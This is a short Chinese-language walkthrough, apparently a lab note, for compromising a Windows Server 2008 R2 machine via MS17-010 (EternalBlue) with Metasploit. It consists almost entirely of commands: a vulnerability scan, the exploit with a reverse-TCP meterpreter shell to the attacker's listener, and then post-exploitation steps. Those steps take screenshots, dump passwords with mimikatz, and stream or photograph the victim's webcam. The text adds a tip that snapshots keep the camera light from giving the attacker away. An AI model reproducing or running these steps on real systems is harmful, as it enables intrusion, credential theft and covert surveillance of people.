测试环境
靶机 Server 2008 R2
攻击机kali
操作步骤
1、启动msf
msfconsole
2、搜索 ms17-010 模块
search ms17-010
1、利用模块1来检测是否有此漏洞
use auxiliary/scanner/smb/smb_ms17_010
set rhost 受害者IP
run
2、利用模块2来进行攻击
查看需要配置的信息
use exploit/windows/smb/ms17_010_eternalblue
show options
设置受害者的IP:
set rhost 受害者IP
设置监听者IP
set lhost 监听者KaliIP
设置payload
set payload windows/x64/meterpreter/reverse_tcp
启动 run 或exploit
run
拿shell
解决乱码情况
chcp 65001
在Meterpreter上的一些别的操作
1、截屏
screenshot
2、获取系统密码
加载mimikatz模块
load mimikatz
获取用户密码
wdigest
3、开启摄像头
检测有没有摄像头
webcam_list
打开摄像头
webcam_stream
打开摄像头,灯会一直亮着,容易被发现
Ctrl + C 退出,(关闭摄像头)
拍照
webcam_snap
拍照,摄像头的灯只是一闪而过。没那么容易发现